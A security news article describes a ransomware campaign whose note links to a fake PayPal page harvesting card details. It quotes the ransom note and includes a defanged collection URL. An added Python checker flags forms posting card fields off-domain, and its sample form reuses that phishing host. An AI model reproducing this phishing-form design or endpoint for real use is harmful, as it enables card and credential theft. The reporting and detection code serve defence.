  • Researchers spotted a new ransomware campaign whose ransom note asks victims to pay via Bitcoin or PayPal.
  • Once users click on PayPal, they are redirected to a fraudulent page that asks for their personal information and payment details.

Researchers from MalwareHunterTeam have discovered a new ransomware family that is capable of stealing PayPal credentials via a phishing site. Its ransom note asks users to pay via Bitcoin or PayPal.

The ransom note, which states that ‘Files have been encrypted! and your computer has been limited!’, asks users to pay via Bitcoin or PayPal to unlock their PCs.

“Files have been encrypted! and your computer has been limited! To unlock your PC you must pay with one of the payment methods provided, we regularly check the activity of your screen and to see if you have paid, PayPal automatically sends us a notification once you’ve paid, But if it doesn't unlock your PC upon payment contact us CryTekk@protonmail[.]com,” the ransom note read, BleepingComputer reported.

“When you pay via BTC, send us an email following your REF number if your PC doesn't unencrypt. Once you pay, your PC will be decrypted. However, if you don’t within 14 days we will continue to infect your PC and extract all your data and use it,” the ransom note added.

Fraudulent PayPal phishing page

The ransom note gives users a choice either to pay via Bitcoin or use PayPal.

  • If users opt for PayPal by clicking the PayPal ‘Buy Now’ button, they are redirected to a phishing page designed to look like a legitimate PayPal page.
  • The fraudulent PayPal page then asks for payment details: the cardholder’s name, debit/credit card number, expiry date, CVV number, and password.
  • Once victims submit their payment details, the collected information is sent to http[:]//ppyc-ve0rf[.]890m[.]com/s2[.]php.
  • The fraudulent page then asks for personal information, including the victim’s address.
  • Once all the information has been entered and submitted, the phishing page states that the account has been unlocked.
  • Finally, users are redirected to the official PayPal login page.
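The tell in the flow above is a form that collects card data but submits it to a host outside PayPal's domain. The following checker is an added example (not code from the page or from MalwareHunterTeam); it assumes an allowlist of `paypal.com` and a constructed sample form modelled on the reported phishing page.

```python
"""Flag HTML forms that collect payment-card data but submit it outside an
allowed domain, the mismatch behind the fake PayPal page described above."""
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_HOSTS = {"paypal.com"}          # assumption: the expected brand domain
CARD_FIELDS = {"cardholder", "cardnumber", "expiry", "cvv", "password"}


class FormCollector(HTMLParser):
    """Collect each form's action URL and the names of its input fields."""

    def __init__(self):
        super().__init__()
        self.forms = []      # list of (action, set_of_input_names)
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = (a.get("action") or "", set())
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None and a.get("name"):
            self._current[1].add(a["name"].lower())

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def host_allowed(action, page_host):
    """An empty or relative action posts back to the page's own host."""
    host = urlparse(action).hostname or page_host
    return any(host == d or host.endswith("." + d) for d in ALLOWED_HOSTS)


def suspicious_forms(html, page_host):
    """Return actions of forms that gather card data yet post off-domain."""
    p = FormCollector()
    p.feed(html)
    return [action for action, names in p.forms
            if names & CARD_FIELDS and not host_allowed(action, page_host)]


# Constructed sample modelled on the phishing page reported above
SAMPLE = """<form action="http://ppyc-ve0rf.890m.com/s2.php" method="post">
<input name="cardholder"><input name="cardnumber"><input name="expiry">
<input name="cvv"><input name="password"></form>
<form action="/search"><input name="q"></form>"""

if __name__ == "__main__":
    print(suspicious_forms(SAMPLE, "www.paypal.com"))
```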

MalwareHunterTeam tweeted, “A ransom note that directs victims to a PayPal phishing page. Clicking on the Buy Now button, it directs to the credit card part of the Phish already (so the login part is skipped). After filling & clicking Agree comes the personal info part & then finished.”

Researchers’ recommendations

  • Researchers urge users to exercise caution when logging into any web page.
  • It is very important to examine a web page and verify its authenticity before entering login credentials.
  • Moreover, researchers recommend that users not enter any information and leave the page if the address looks suspicious or the content does not match the expected site.

Cyware Publisher